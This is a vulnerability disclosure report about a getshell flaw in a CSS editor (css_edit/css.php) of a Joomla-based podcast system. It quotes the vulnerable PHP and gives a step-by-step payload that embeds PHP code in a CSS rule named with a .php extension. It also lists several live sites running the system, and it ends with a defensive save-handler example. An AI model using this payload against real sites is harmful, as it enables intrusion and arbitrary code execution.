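2014-01-06: Details reported to the vendor; awaiting vendor handling
2014-01-11: Vendor confirmed; details disclosed to the vendor only
2014-01-14: Details opened to third-party security partners
2014-03-07: Details disclosed to core white hats and experts in related fields
2014-03-17: Details disclosed to regular white hats
2014-03-27: Details disclosed to intern white hats
2014-04-06: Details disclosed to the public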
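I heard there is a reward for submitting generic vulnerabilities, so here is one I found last year.
Judging by its interface, the podcast system from 北京尙为视讯科技有限公司 looks like a secondary development of Joomla. I found this getshell vulnerability last year while doing an authorized test of a system. The vulnerable file is http://www.shinyv.com/css_edit/css.php, a CSS editor.
This CSS editor does not properly filter the data passed to it, which leads to getshell. css.php, lines 1370-1375: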
    <form action="<?php echo $_SERVER['PHP_SELF']?>" method="POST" name="formAdmin">
    <TEXTAREA id=output style="BORDER-RIGHT: gray 1px solid; BORDER-TOP: gray 1px solid; MARGIN: px; BORDER-LEFT: gray 1px solid; WIDTH: 220px; BORDER-BOTTOM: gray 1px solid" name=textarea rows=7>
    </TEXTAREA>
    <br>
    <input type="submit" value="保存代码" name="submit" >
    </form>
That uploads the data; then lines 1398-1460:
    <?php
    $textarea = $_POST['textarea'];
    $css_name = 'template_css.css';
    $fp = fopen($css_name,'a+');
    $css_back = file_get_contents($css_name);
    $start = strpos($textarea,".");
    $end = strpos($textarea,"{");
    $start = $start+1;
    $end = $end - 1;;
    $css_name = substr($textarea,$start,$end);
    // echo $css_name;
    $nums = strpos($css_back,$css_name);
    echo $nums;
    if ($nums == ""){
        file_put_contents($css_name,$textarea);
    }
    $content = file_get_contents($css_name,$textarea);
    echo $content;
    /*
    $num = strlen($css_name);
    // echo $num;
    $num_start = strpos($css_back,$css_name);
    // echo $num_start;
    $num_end = strpos($css_back,"}",$num_start);
    // echo $num_end;
    $num_start = $num_start -1 ;
    $num_end = $num_end +1;
    $str_back = substr($css_back,$num_start,$num_end);
    // echo $str_back;
    $new_css = substr_replace($css_back,$textarea,$num_start,$num_end);
    // echo $new_css;
    // fwrite($fp,$new_css);
    // $fp = fopen($css_name,'w+');
    $content = file_get_contents($css_name);
    echo $content;
    // file_put_contents($css_name,$new_css);
    //$content = file_get_contents($css_name);
    //echo $content;
    /*
    echo $text_area;
    echo $num;
    echo $re_str;
    /*
    $str1 = "qqqqq";
    $srt = "qqq{} aaaa{rewqrewqrewq} aaa{}";
    $str = "aaaa";
    $qqq = substr($srt,7,19);
    echo $qqq;
    str_replace($qqq,$str)
    //echo strpos($srt,"}",5);
    //echo strlen($str);
    //echo strpos($srt,$str);
    $str = "abcdef";
    $strt = substr_replace($str,"aa",0,1);
    echo $strt;
    */
    ?>
So, submit:
    .someclass.php{
    color : #C7FF38;
    background-color : #E89100;
    border-width : 1px;
    <?php phpinfo()?>
    border-top-width : 1px;
    border-left-width : 11px;
    border-bottom-width : 1px;
    border-color : transparent;}
Click 保存代码 (save code), then visit http://www.shinyv.com/css_edit/someclass.php
Quite a lot of sites use this system:
http://tv.tianjinwe.com/css_edit/css.php
http://www.woshitv.com/css_edit/css.php
http://audio.cnr.cn/css_edit/css.php
and so on.
Delete the files that are not needed.
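Where the editor has to stay rather than be deleted, the save handler can write to a fixed file and accept only a plain class rule, so that neither the file name nor PHP tags come from the request. This is an added example, not the vendor's or the reporter's code; the STYLESHEET path, the function names and the accepted rule grammar are assumptions.

```php
<?php
// Added example (assumed names: STYLESHEET, sanitize_css_rule, save_css_rule).
// The destination is a constant; nothing in the request can choose the file name.
const STYLESHEET = __DIR__ . '/template_css.css';

// Accept exactly one ".classname { prop: value; ... }" rule, or return null.
function sanitize_css_rule(string $input): ?string
{
    // Class names cannot contain dots; the body cannot contain braces, < > or backslashes.
    $rule = '/\A\s*\.([A-Za-z_][A-Za-z0-9_-]{0,63})\s*\{([^{}<>\\\\]*)\}\s*\z/';
    if (!preg_match($rule, $input, $m)) {
        return null;
    }
    $decls = [];
    // Split the body into trimmed, non-empty declarations.
    foreach (array_filter(array_map('trim', explode(';', $m[2])), 'strlen') as $decl) {
        // Each declaration must be a plain property and a simple value.
        if (!preg_match('/\A[a-z-]+\s*:\s*[#A-Za-z0-9 .,%-]+\z/', $decl)) {
            return null;
        }
        $decls[] = $decl;
    }
    if ($decls === []) {
        return null;
    }
    // Re-serialize from the validated parts rather than storing the raw input.
    return '.' . $m[1] . " {\n    " . implode(";\n    ", $decls) . ";\n}\n";
}

function save_css_rule(string $input, string $path = STYLESHEET): bool
{
    $rule = sanitize_css_rule($input);
    return $rule !== null
        && file_put_contents($path, $rule, FILE_APPEND | LOCK_EX) !== false;
}

if (PHP_SAPI === 'cli') {
    // Constructed inputs: a plain rule, then a rule shaped like the one in the report.
    var_dump(sanitize_css_rule('.box{ color : #C7FF38; border-width : 1px; }') !== null);
    var_dump(sanitize_css_rule('.someclass.php{ color : #C7FF38; <?php phpinfo()?> }') !== null);
} elseif (($_SERVER['REQUEST_METHOD'] ?? '') === 'POST') {
    // Authentication and CSRF checks are assumed to have run before this point.
    $in = $_POST['textarea'] ?? '';
    $ok = is_string($in) && save_css_rule($in);
    http_response_code($ok ? 200 : 400);
    echo $ok ? 'saved' : 'rejected';
}
```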
Severity: High
Vulnerability Rank: 17
Confirmed: 2014-01-11 10:08
None yet